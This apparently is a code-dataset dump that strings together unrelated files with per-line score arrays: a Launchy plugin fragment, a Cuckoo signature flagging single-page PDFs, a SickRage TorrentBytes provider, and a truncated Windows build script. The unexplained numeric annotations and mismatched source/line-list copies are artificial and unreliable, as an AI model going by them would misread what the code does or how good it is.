= command[:verbIdx] else: commandToExec = command resultsList.append( launchy.CatItem(text, commandToExec, self.getID(), self.getIcon() )) def getCatalog(self, resultsList): pass def launchItem(self, inputDataList, catItemOrig): catItem = inputDataList[-1].getTopResult() print catItem.fullPath, catItem.shortName runmenuApp = 'C:\\Program Files\\Launchy\\plugins\\python\\runmenu\\runmenu.exe' runmenu = Popen([runmenuApp, '/exec:%s' % catItem.shortName, catItem.fullPath], stdout=PIPE, startupinfo=self.__startupinfo) print runmenu.stdout.read() def launchyShow(self): pass def launchyHide(self): pass __startupinfo = subprocess.STARTUPINFO() __startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW __startupinfo.wShowWindow = subprocess.SW_HIDE launchy.registerPlugin(PyVerby)
[ "# Copyright (c) 2008 Shahar Kosti\r\n", "#\r\n", "# This program is free software; you can redistribute it and/or modify it under\r\n", "# the terms of the GNU General Public License as published by the Free Software\r\n", "# Foundation; either version 2 of the License, or (at your option) any later\r\n", "# version.\r\n", "#\r\n", "# This program is distributed in the hope that it will be useful, but WITHOUT\r\n", "# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\r\n", "# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n", "#\r\n", "# You should have received a copy of the GNU General Public License along with\r\n", "# this program; if not, write to the Free Software Foundation, Inc.,\r\n", "# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n", "\r\n", "#import rpdb2; rpdb2.start_embedded_debugger(\"password\")\r\n", "import launchy\r\n", "import sys, os\r\n", "\r\n", "import subprocess\r\n", "from subprocess import Popen, PIPE\r\n", "\r\n", "class PyVerby(launchy.Plugin):\r\n", "\tdef __init__(self):\r\n", "\t\tlaunchy.Plugin.__init__(self)\r\n", "\t\tself.icon = os.path.join(launchy.getIconsPath(), \"pysimple.png\")\r\n", "\t\tself.hash = launchy.hash(self.getName())\r\n", "\t\tself.labelHash = launchy.hash(\"pyverby\")\r\n", "\r\n", "\tdef init(self):\r\n", "\t\tpass\r\n", "\t\t\r\n", "\tdef getID(self):\r\n", "\t\treturn self.hash\r\n", "\t\r\n", "\tdef getName(self):\r\n", "\t\treturn \"PyVerby\"\r\n", "\t\t\r\n", "\tdef getIcon(self):\r\n", "\t\treturn self.icon\r\n", "\t\t\r\n", "\tdef getLabels(self, inputDataList):\r\n", "\t\tpass\r\n", "\t\t\r\n", "\tdef getResults(self, inputDataList, resultsList):\r\n", "\t\tif len(inputDataList) < 1:\r\n", "\t\t\treturn\r\n", "\t\t\r\n", "\t\ttext = inputDataList[0].getText()\r\n", "\t\tisVerbyQuery = ( text[-4:-1] == \" \" )\r\n", "\t\tprint \"%s##%s##%s\" % (text, text[-4:-1], isVerbyQuery)\r\n", "\t\tif not isVerbyQuery:\r\n", 
"\t\t\treturn\r\n", "\t\t\r\n", "\t\ttext = text[:-4]\r\n", "\t\tisFileOrDir = os.path.isdir(text) or os.path.isfile(text)\r\n", "\t\tprint \"%s##%s\" % (text, isFileOrDir)\r\n", "\t\tif not isFileOrDir:\r\n", "\t\t\treturn\r\n", "\t\t\r\n", "\t\trunmenuApp = 'C:\\\\Program Files\\\\Launchy\\\\plugins\\\\python\\\\runmenu\\\\runmenu.exe'\r\n", "\t\trunmenu = Popen([runmenuApp, \"/list\", text], stdout=PIPE, startupinfo=self.__startupinfo)\r\n", "\t\toutput = runmenu.stdout.read()\r\n", "\t\t\r\n", "\t\tsplitted = output.split(\"\\r\\n\")\t\t\r\n", "\t\tfor command in splitted:\r\n", "\t\t\tif command == \"\":\r\n", "\t\t\t\tcontinue\r\n", "\t\t\t\t\r\n", "\t\t\tverbIdx = command.rfind(\"(Verb:\")\r\n", "\t\t\tif verbIdx > -1:\r\n", "\t\t\t\tcommandToExec = command[:verbIdx]\r\n", "\t\t\telse:\r\n", "\t\t\t\tcommandToExec = command\r\n", "\t\t\t\t\r\n", "\t\t\tresultsList.append( launchy.CatItem(text, commandToExec, self.getID(), self.getIcon() ))\r\n", "\t\t\r\n", "\tdef getCatalog(self, resultsList):\r\n", "\t\tpass\r\n", "\t\t\r\n", "\tdef launchItem(self, inputDataList, catItemOrig):\r\n", "\t\tcatItem = inputDataList[-1].getTopResult()\r\n", "\t\tprint catItem.fullPath, catItem.shortName\r\n", "\t\trunmenuApp = 'C:\\\\Program Files\\\\Launchy\\\\plugins\\\\python\\\\runmenu\\\\runmenu.exe'\r\n", "\t\trunmenu = Popen([runmenuApp, '/exec:%s' % catItem.shortName, catItem.fullPath], stdout=PIPE, startupinfo=self.__startupinfo)\r\n", "\t\t\r\n", "\t\tprint runmenu.stdout.read()\r\n", "\t\t\r\n", "\tdef launchyShow(self):\r\n", "\t\tpass\r\n", "\t\t\t\r\n", "\tdef launchyHide(self):\r\n", "\t\tpass\r\n", "\t\r\n", "\t__startupinfo = subprocess.STARTUPINFO()\r\n", "\t__startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\r\n", "\t__startupinfo.wShowWindow = subprocess.SW_HIDE\r\n", "\r\n", "\r\n", "launchy.registerPlugin(PyVerby)\r\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0.017241379310344827, 0, 0.0625, 0, 0, 0, 0, 0.03125, 0.045454545454545456, 0.030303030303030304, 0.014705882352941176, 0.022727272727272728, 0.022727272727272728, 0, 0.05555555555555555, 0.125, 0.5, 0.05263157894736842, 0.05, 0.6666666666666666, 0.047619047619047616, 0.05, 0.5, 0.047619047619047616, 0.05, 0.5, 0.02631578947368421, 0.125, 0.5, 0.019230769230769232, 0.03333333333333333, 0.09090909090909091, 0.5, 0.02702702702702703, 0.06976744186046512, 0.017241379310344827, 0.041666666666666664, 0.09090909090909091, 0.5, 0.05, 0.01639344262295082, 0.025, 0.043478260869565216, 0.09090909090909091, 0.5, 0.023809523809523808, 0.021505376344086023, 0.029411764705882353, 0.5, 0.05405405405405406, 0.03571428571428571, 0.045454545454545456, 0.07142857142857142, 0.3333333333333333, 0.02631578947368421, 0.047619047619047616, 0.02564102564102564, 0.1, 0.034482758620689655, 0.3333333333333333, 0.043010752688172046, 0.5, 0.02702702702702703, 0.125, 0.5, 0.019230769230769232, 0.021739130434782608, 0.022222222222222223, 0.023809523809523808, 0.015625, 0.5, 0.03225806451612903, 0.5, 0.04, 0.125, 0.4, 0.04, 0.125, 0.6666666666666666, 0.023255813953488372, 0.01694915254237288, 0.02040816326530612, 0, 0, 0 ]
100
0.111407
false
# Copyright (C) 2012-2014 Cuckoo Foundation. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from lib.cuckoo.common.abstracts import Signature class PDF_Page(Signature): name = "pdf_page" description = "The PDF has one page. Many malicious PDFs only have one page." severity = 2 categories = ["pdf"] authors = ["KillerInstinct"] minimum = "1.3" filter_analysistypes = set(["file"]) def run(self): if "static" in self.results and "pdf" in self.results["static"]: if "PDF" in self.results["target"]["file"]["type"]: if "Keywords" in self.results["static"]["pdf"]: if "/Page" in self.results["static"]["pdf"]["Keywords"]: if self.results["static"]["pdf"]["Keywords"]["/Page"] == 1: return True return False
[ "# Copyright (C) 2012-2014 Cuckoo Foundation.\n", "#\n", "# This program is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# This program is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU General Public License\n", "# along with this program. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "from lib.cuckoo.common.abstracts import Signature\n", "\n", "class PDF_Page(Signature):\n", " name = \"pdf_page\"\n", " description = \"The PDF has one page. Many malicious PDFs only have one page.\"\n", " severity = 2\n", " categories = [\"pdf\"]\n", " authors = [\"KillerInstinct\"]\n", " minimum = \"1.3\"\n", "\n", " filter_analysistypes = set([\"file\"])\n", "\n", " def run(self):\n", " if \"static\" in self.results and \"pdf\" in self.results[\"static\"]:\n", " if \"PDF\" in self.results[\"target\"][\"file\"][\"type\"]:\n", " if \"Keywords\" in self.results[\"static\"][\"pdf\"]:\n", " if \"/Page\" in self.results[\"static\"][\"pdf\"][\"Keywords\"]:\n", " if self.results[\"static\"][\"pdf\"][\"Keywords\"][\"/Page\"] == 1:\n", " return True\n", "\n", " return False\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0 ]
36
0.001698
false
# Author: Idan Gutman
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.

import re
import urllib
import traceback

from sickbeard import logger
from sickbeard import tvcache
from sickbeard.providers import generic
from sickbeard.bs4_parser import BS4Parser


class TorrentBytesProvider(generic.TorrentProvider):
    """Search provider for the TorrentBytes private tracker."""

    def __init__(self):

        generic.TorrentProvider.__init__(self, "TorrentBytes")

        self.supportsBacklog = True

        # Populated from user configuration by the provider framework.
        self.username = None
        self.password = None
        self.ratio = None
        self.minseed = None
        self.minleech = None
        self.freeleech = False

        self.urls = {'base_url': 'https://www.torrentbytes.net',
                     'login': 'https://www.torrentbytes.net/takelogin.php',
                     'detail': 'https://www.torrentbytes.net/details.php?id=%s',
                     'search': 'https://www.torrentbytes.net/browse.php?search=%s%s',
                     'download': 'https://www.torrentbytes.net/download.php?id=%s&name=%s'}

        self.url = self.urls['base_url']

        # TV category filters appended to every search URL.
        self.categories = "&c41=1&c33=1&c38=1&c32=1&c37=1"

        self.proper_strings = ['PROPER', 'REPACK']

        self.cache = TorrentBytesCache(self)

    def isEnabled(self):
        return self.enabled

    def _doLogin(self):
        """Log in to the tracker. Returns True on success, False otherwise."""
        login_params = {'username': self.username,
                        'password': self.password,
                        'login': 'Log in!'}

        response = self.getURL(self.urls['login'], post_data=login_params, timeout=30)
        if not response:
            logger.log(u"Unable to connect to provider", logger.WARNING)
            return False

        if re.search('Username or password incorrect', response):
            logger.log(u"Invalid username or password. Check your settings", logger.WARNING)
            return False

        return True

    def _doSearch(self, search_params, search_mode='eponly', epcount=0, age=0, epObj=None):
        """Run every search string in search_params against the tracker.

        Returns a list of (title, download_url, size, seeders, leechers)
        tuples, sorted by seeders (descending) within each search mode.
        Results below the configured seeder/leecher minimums are dropped.
        """
        results = []
        items = {'Season': [], 'Episode': [], 'RSS': []}

        if not self._doLogin():
            return results

        for mode in search_params.keys():
            logger.log(u"Search Mode: %s" % mode, logger.DEBUG)
            for search_string in search_params[mode]:

                if mode != 'RSS':
                    logger.log(u"Search string: %s " % search_string, logger.DEBUG)

                searchURL = self.urls['search'] % (urllib.quote(search_string.encode('utf-8')), self.categories)
                logger.log(u"Search URL: %s" % searchURL, logger.DEBUG)

                data = self.getURL(searchURL)
                if not data:
                    continue

                try:
                    with BS4Parser(data, features=["html5lib", "permissive"]) as html:
                        # Continue only if at least one release is found
                        empty = html.find('Nothing found!')
                        if empty:
                            logger.log(u"Data returned from provider does not contain any torrents", logger.DEBUG)
                            continue

                        torrent_table = html.find('table', attrs={'border': '1'})
                        torrent_rows = torrent_table.find_all('tr') if torrent_table else []

                        # Skip the header row.
                        for result in torrent_rows[1:]:
                            cells = result.find_all('td')
                            size = None
                            link = cells[1].find('a', attrs={'class': 'index'})

                            full_id = link['href'].replace('details.php?id=', '')
                            torrent_id = full_id.split("&")[0]

                            # Freeleech torrents are marked with a green [F L]
                            # in the title (i.e. <font color=green>[F&nbsp;L]</font>)
                            freeleechTag = cells[1].find('font', attrs={'color': 'green'})
                            if freeleechTag and freeleechTag.text == u'[F\xa0L]':
                                isFreeleechTorrent = True
                            else:
                                isFreeleechTorrent = False

                            if self.freeleech and not isFreeleechTorrent:
                                continue

                            try:
                                # has_attr is the bs4 API; Tag.has_key was removed.
                                if link.has_attr('title'):
                                    title = cells[1].find('a', {'class': 'index'})['title']
                                else:
                                    title = link.contents[0]
                                download_url = self.urls['download'] % (torrent_id, link.contents[0])
                                seeders = int(cells[8].find('span').contents[0])
                                leechers = int(cells[9].find('span').contents[0])

                                # Need size for failed downloads handling
                                if size is None:
                                    if re.match(r'[0-9]+,?\.?[0-9]*[KkMmGg]+[Bb]+', cells[6].text):
                                        size = self._convertSize(cells[6].text)
                                    if not size:
                                        size = -1

                            except (AttributeError, TypeError):
                                continue

                            if not all([title, download_url]):
                                continue

                            # Filter unseeded torrents
                            if seeders < self.minseed or leechers < self.minleech:
                                if mode != 'RSS':
                                    logger.log(u"Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})".format(title, seeders, leechers), logger.DEBUG)
                                continue

                            item = title, download_url, size, seeders, leechers
                            if mode != 'RSS':
                                logger.log(u"Found result: %s " % title, logger.DEBUG)

                            items[mode].append(item)

                except Exception:
                    logger.log(u"Failed parsing provider. Traceback: %s" % traceback.format_exc(), logger.ERROR)

            # For each search mode sort all the items by seeders if available
            items[mode].sort(key=lambda tup: tup[3], reverse=True)

            results += items[mode]

        return results

    def seedRatio(self):
        return self.ratio

    def _convertSize(self, sizeString):
        """Convert a human-readable size such as '1,024 MB' to bytes.

        Returns the size in bytes as an int, or -1 when the string cannot
        be parsed. Thousands separators (commas) are tolerated because the
        caller's pre-check regex admits them; the old implementation
        crashed on them (float('1,024 ')) and matched units by substring.
        """
        match = re.match(r'\s*([0-9,]*\.?[0-9]+)\s*([KMGT]?B)', sizeString, re.I)
        if not match:
            return -1
        size = float(match.group(1).replace(',', ''))
        multipliers = {'B': 1, 'KB': 1024, 'MB': 1024 ** 2,
                       'GB': 1024 ** 3, 'TB': 1024 ** 4}
        return int(size * multipliers[match.group(2).upper()])


class TorrentBytesCache(tvcache.TVCache):
    """RSS cache for TorrentBytes, polled at most every 20 minutes."""

    def __init__(self, provider_obj):

        tvcache.TVCache.__init__(self, provider_obj)

        # only poll TorrentBytes every 20 minutes max
        self.minTime = 20

    def _getRSSData(self):
        search_params = {'RSS': ['']}
        return {'entries': self.provider._doSearch(search_params)}


provider = TorrentBytesProvider()
[ "# Author: Idan Gutman\n", "# URL: http://code.google.com/p/sickbeard/\n", "#\n", "# This file is part of SickRage.\n", "#\n", "# SickRage is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# SickRage is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU General Public License\n", "# along with SickRage. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "import re\n", "import urllib\n", "import traceback\n", "\n", "from sickbeard import logger\n", "from sickbeard import tvcache\n", "from sickbeard.providers import generic\n", "from sickbeard.bs4_parser import BS4Parser\n", "\n", "\n", "class TorrentBytesProvider(generic.TorrentProvider):\n", "\n", " def __init__(self):\n", "\n", " generic.TorrentProvider.__init__(self, \"TorrentBytes\")\n", "\n", " self.supportsBacklog = True\n", "\n", " self.username = None\n", " self.password = None\n", " self.ratio = None\n", " self.minseed = None\n", " self.minleech = None\n", " self.freeleech = False\n", "\n", " self.urls = {'base_url': 'https://www.torrentbytes.net',\n", " 'login': 'https://www.torrentbytes.net/takelogin.php',\n", " 'detail': 'https://www.torrentbytes.net/details.php?id=%s',\n", " 'search': 'https://www.torrentbytes.net/browse.php?search=%s%s',\n", " 'download': 'https://www.torrentbytes.net/download.php?id=%s&name=%s'}\n", "\n", " self.url = self.urls['base_url']\n", "\n", " self.categories = \"&c41=1&c33=1&c38=1&c32=1&c37=1\"\n", "\n", " self.proper_strings = ['PROPER', 'REPACK']\n", "\n", " self.cache = TorrentBytesCache(self)\n", "\n", " def 
isEnabled(self):\n", " return self.enabled\n", "\n", " def _doLogin(self):\n", "\n", " login_params = {'username': self.username,\n", " 'password': self.password,\n", " 'login': 'Log in!'}\n", "\n", " response = self.getURL(self.urls['login'], post_data=login_params, timeout=30)\n", " if not response:\n", " logger.log(u\"Unable to connect to provider\", logger.WARNING)\n", " return False\n", "\n", " if re.search('Username or password incorrect', response):\n", " logger.log(u\"Invalid username or password. Check your settings\", logger.WARNING)\n", " return False\n", "\n", " return True\n", "\n", " def _doSearch(self, search_params, search_mode='eponly', epcount=0, age=0, epObj=None):\n", "\n", " results = []\n", " items = {'Season': [], 'Episode': [], 'RSS': []}\n", "\n", " if not self._doLogin():\n", " return results\n", "\n", " for mode in search_params.keys():\n", " logger.log(u\"Search Mode: %s\" % mode, logger.DEBUG)\n", " for search_string in search_params[mode]:\n", "\n", " if mode != 'RSS':\n", " logger.log(u\"Search string: %s \" % search_string, logger.DEBUG)\n", "\n", " searchURL = self.urls['search'] % (urllib.quote(search_string.encode('utf-8')), self.categories)\n", " logger.log(u\"Search URL: %s\" % searchURL, logger.DEBUG)\n", "\n", " data = self.getURL(searchURL)\n", " if not data:\n", " continue\n", "\n", " try:\n", " with BS4Parser(data, features=[\"html5lib\", \"permissive\"]) as html:\n", " #Continue only if one Release is found\n", " empty = html.find('Nothing found!')\n", " if empty:\n", " logger.log(u\"Data returned from provider does not contain any torrents\", logger.DEBUG)\n", " continue\n", "\n", " torrent_table = html.find('table', attrs={'border': '1'})\n", " torrent_rows = torrent_table.find_all('tr') if torrent_table else []\n", "\n", " for result in torrent_rows[1:]:\n", " cells = result.find_all('td')\n", " size = None\n", " link = cells[1].find('a', attrs={'class': 'index'})\n", "\n", " full_id = 
link['href'].replace('details.php?id=', '')\n", " torrent_id = full_id.split(\"&\")[0]\n", "\n", " #Free leech torrents are marked with green [F L] in the title (i.e. <font color=green>[F&nbsp;L]</font>)\n", " freeleechTag = cells[1].find('font', attrs={'color': 'green'})\n", " if freeleechTag and freeleechTag.text == u'[F\\xa0L]':\n", " isFreeleechTorrent = True\n", " else:\n", " isFreeleechTorrent = False\n", "\n", " if self.freeleech and not isFreeleechTorrent:\n", " continue\n", "\n", " try:\n", " if link.has_key('title'):\n", " title = cells[1].find('a', {'class': 'index'})['title']\n", " else:\n", " title = link.contents[0]\n", " download_url = self.urls['download'] % (torrent_id, link.contents[0])\n", " seeders = int(cells[8].find('span').contents[0])\n", " leechers = int(cells[9].find('span').contents[0]) \n", " \n", " # Need size for failed downloads handling\n", " if size is None:\n", " if re.match(r'[0-9]+,?\\.?[0-9]*[KkMmGg]+[Bb]+', cells[6].text):\n", " size = self._convertSize(cells[6].text)\n", " if not size:\n", " size = -1\n", " \n", " except (AttributeError, TypeError):\n", " continue\n", "\n", " if not all([title, download_url]):\n", " continue\n", "\n", " #Filter unseeded torrent\n", " if seeders < self.minseed or leechers < self.minleech:\n", " if mode != 'RSS':\n", " logger.log(u\"Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})\".format(title, seeders, leechers), logger.DEBUG)\n", " continue\n", "\n", " item = title, download_url, size, seeders, leechers\n", " if mode != 'RSS':\n", " logger.log(u\"Found result: %s \" % title, logger.DEBUG)\n", "\n", " items[mode].append(item)\n", "\n", " except Exception, e:\n", " logger.log(u\"Failed parsing provider. 
Traceback: %s\" % traceback.format_exc(), logger.ERROR)\n", "\n", " #For each search mode sort all the items by seeders if available\n", " items[mode].sort(key=lambda tup: tup[3], reverse=True)\n", "\n", " results += items[mode]\n", "\n", " return results\n", "\n", " def seedRatio(self):\n", " return self.ratio\n", " \n", " def _convertSize(self, sizeString):\n", " size = sizeString[:-2]\n", " modifier = sizeString[-2:]\n", " size = float(size)\n", " if modifier in 'KB':\n", " size = size * 1024\n", " elif modifier in 'MB':\n", " size = size * 1024**2\n", " elif modifier in 'GB':\n", " size = size * 1024**3\n", " elif modifier in 'TB':\n", " size = size * 1024**4\n", " return int(size)\n", "\n", "\n", "class TorrentBytesCache(tvcache.TVCache):\n", " def __init__(self, provider_obj):\n", "\n", " tvcache.TVCache.__init__(self, provider_obj)\n", "\n", " # only poll TorrentBytes every 20 minutes max\n", " self.minTime = 20\n", "\n", " def _getRSSData(self):\n", " search_params = {'RSS': ['']}\n", " return {'entries': self.provider._doSearch(search_params)}\n", "\n", "\n", "provider = TorrentBytesProvider()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.011627906976744186, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0.010752688172043012, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0.008849557522123894, 0.0136986301369863, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0.015873015873015872, 0, 0, 0.008695652173913044, 0, 0, 0.012195121951219513, 0.010752688172043012, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0.015037593984962405, 0.01098901098901099, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0.010869565217391304, 0, 0, 0.00980392156862745, 0.012345679012345678, 0.02247191011235955, 0.017241379310344827, 0, 0, 0.01, 0, 0, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0.018867924528301886, 0.012048192771084338, 0, 0.005208333333333333, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0.008849557522123894, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
204
0.003003
false
#!python3
# -*- coding:utf-8 -*-
# Build-automation script (Windows only): optionally git-pulls source
# directories, then builds a Visual Studio solution with MSBuild or
# IncrediBuild, logging colored progress to console and a log file.
import os
import sys
import time
import ctypes
import shutil
import subprocess
IsPy3 = sys.version_info[0] >= 3
if IsPy3:
    import winreg
else:
    import codecs
    import _winreg as winreg

BuildType = 'Release'
IsRebuild = True
Build = 'Rebuild'
Update = False
Copy = False
CleanAll = False
BuildTimeout = 30*60
MSBuild = None
IncrediBuild = None
UseMSBuild = True  # build with MSBuild by default; if False, use IncrediBuild

# Only the following 5 variables need changing for a different project
SlnFile = '../CAceTCPServer.sln'  # path relative to this script
UpdateDir = []  # dirs relative to this script to 'git pull'; empty list skips updating
ExecBatList = []  # bat scripts (relative to this script) run before building; cd to the bat's dir first
MSBuildFirstProjects = [r'CAceTCPServer']  # MSBuild needs the project's path inside the sln
                                           # projects MSBuild builds first; empty = unordered
IncrediBuildFirstProjects = ['CAceTCPServer']  # IncrediBuild only needs the project name
                                               # projects IncrediBuild builds first; empty = unordered

class ConsoleColor():
    '''This class defines the values of color for printing on console window'''
    Black = 0
    DarkBlue = 1
    DarkGreen = 2
    DarkCyan = 3
    DarkRed = 4
    DarkMagenta = 5
    DarkYellow = 6
    Gray = 7
    DarkGray = 8
    Blue = 9
    Green = 10
    Cyan = 11
    Red = 12
    Magenta = 13
    Yellow = 14
    White = 15

class Coord(ctypes.Structure):
    _fields_ = [('X', ctypes.c_short), ('Y', ctypes.c_short)]

class SmallRect(ctypes.Structure):
    _fields_ = [('Left', ctypes.c_short),
                ('Top', ctypes.c_short),
                ('Right', ctypes.c_short),
                ('Bottom', ctypes.c_short),
                ]

class ConsoleScreenBufferInfo(ctypes.Structure):
    _fields_ = [('dwSize', Coord),
                ('dwCursorPosition', Coord),
                ('wAttributes', ctypes.c_uint),
                ('srWindow', SmallRect),
                ('dwMaximumWindowSize', Coord),
                ]

class Win32API():
    '''Some native methods for python calling'''
    StdOutputHandle = -11
    ConsoleOutputHandle = None
    DefaultColor = None

    @staticmethod
    def SetConsoleColor(color):
        '''Change the text color on console window'''
        if not Win32API.DefaultColor:
            if not Win32API.ConsoleOutputHandle:
                Win32API.ConsoleOutputHandle = ctypes.windll.kernel32.GetStdHandle(Win32API.StdOutputHandle)
            # Remember the original attributes so ResetConsoleColor can restore them.
            bufferInfo = ConsoleScreenBufferInfo()
            ctypes.windll.kernel32.GetConsoleScreenBufferInfo(Win32API.ConsoleOutputHandle, ctypes.byref(bufferInfo))
            Win32API.DefaultColor = int(bufferInfo.wAttributes & 0xFF)
        if IsPy3:
            sys.stdout.flush() # need flush stdout in python 3
        ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, color)

    @staticmethod
    def ResetConsoleColor():
        '''Reset the default text color on console window'''
        if IsPy3:
            sys.stdout.flush() # need flush stdout in python 3
        ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, Win32API.DefaultColor)

class Logger():
    LogFile = '@AutomationLog.txt'
    LineSep = '\n'
    @staticmethod
    def Write(log, consoleColor = -1, writeToFile = True, printToStdout = True):
        '''
        consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen
        if consoleColor == -1, use default color
        '''
        if printToStdout:
            isValidColor = (consoleColor >= ConsoleColor.Black and consoleColor <= ConsoleColor.White)
            if isValidColor:
                Win32API.SetConsoleColor(consoleColor)
            try:
                sys.stdout.write(log)
            except UnicodeError as e:
                Win32API.SetConsoleColor(ConsoleColor.Red)
                isValidColor = True
                sys.stdout.write(str(type(e)) + ' can\'t print the log!\n')
            if isValidColor:
                Win32API.ResetConsoleColor()
        if not writeToFile:
            return
        if IsPy3:
            logFile = open(Logger.LogFile, 'a+', encoding = 'utf-8')
        else:
            logFile = codecs.open(Logger.LogFile, 'a+', 'utf-8')
        try:
            logFile.write(log)
            # logFile.flush() # need flush in python 3, otherwise log won't be saved
        except Exception as ex:
            logFile.close()
            sys.stdout.write('can not write log with exception: {0} {1}'.format(type(ex), ex))

    @staticmethod
    def WriteLine(log, consoleColor = -1, writeToFile = True, printToStdout = True):
        '''
        consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen
        if consoleColor == -1, use default color
        '''
        Logger.Write(log + Logger.LineSep, consoleColor, writeToFile, printToStdout)

    @staticmethod
    def Log(log, consoleColor = -1, writeToFile = True, printToStdout = True):
        '''
        consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen
        if consoleColor == -1, use default color
        '''
        t = time.localtime()
        log = '{0}-{1:02}-{2:02} {3:02}:{4:02}:{5:02} - {6}{7}'.format(t.tm_year, t.tm_mon, t.tm_mday,
                                                                       t.tm_hour, t.tm_min, t.tm_sec, log, Logger.LineSep)
        Logger.Write(log, consoleColor, writeToFile, printToStdout)

    @staticmethod
    def DeleteLog():
        if os.path.exists(Logger.LogFile):
            os.remove(Logger.LogFile)


def GetMSBuildPath():
    '''Locate MSBuild.exe via a temporary bat that sets up the VS2013 env.'''
    cmd = 'call "%VS120COMNTOOLS%..\\..\\VC\\vcvarsall.bat" x86\nwhere msbuild'
    ftemp = open('GetMSBuildPath.bat', 'wt')
    ftemp.write(cmd)
    ftemp.close()
    p = subprocess.Popen('GetMSBuildPath.bat', stdout = subprocess.PIPE)
    p.wait()
    lines = p.stdout.read().decode().splitlines()
    os.remove('GetMSBuildPath.bat')
    for line in lines:
        if 'MSBuild.exe' in line:
            return line

def GetIncrediBuildPath():
    '''Locate IncrediBuild's BuildConsole.exe via the registry, or None.'''
    try:
        key=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Classes\IncrediBuild.MonitorFile\shell\open\command')
        value, typeId = winreg.QueryValueEx(key, '')
        if value:
            start = value.find('"')
            end = value.find('"', start + 1)
            path = value[start+1:end]
            buildConsole = os.path.join(os.path.dirname(path), 'BuildConsole.exe')
            return buildConsole
    # OSError covers py3's FileNotFoundError and py2's WindowsError;
    # the old `except FileNotFoundError` raised NameError on py2.
    except OSError:
        Logger.WriteLine('can not find IncrediBuild', ConsoleColor.Red)

def UpdateCode():
    '''git-pull every directory in UpdateDir; return True if all succeed.'''
    # put git to path first
    # NOTE(review): shutil.which is Python 3 only — confirm py2 support is still needed
    if not shutil.which('git.exe'):
        # '\\b' (was '\b', a backspace) so the message shows "git\bin"
        Logger.Log('找不到git.exe. 请确认安装git时将git\\bin目录路径加入到环境变量path中!!!\n, 跳过更新代码!!!', ConsoleColor.Yellow)
        return False
    oldDir = os.getcwd()
    for dir in UpdateDir:
        os.chdir(dir)
        ret = os.system('git pull')
        os.chdir(oldDir)
        if ret != 0:
            Logger.Log('update {0} failed'.format(dir), ConsoleColor.Yellow)
            return False
    return True

def BuildProject(cmd):
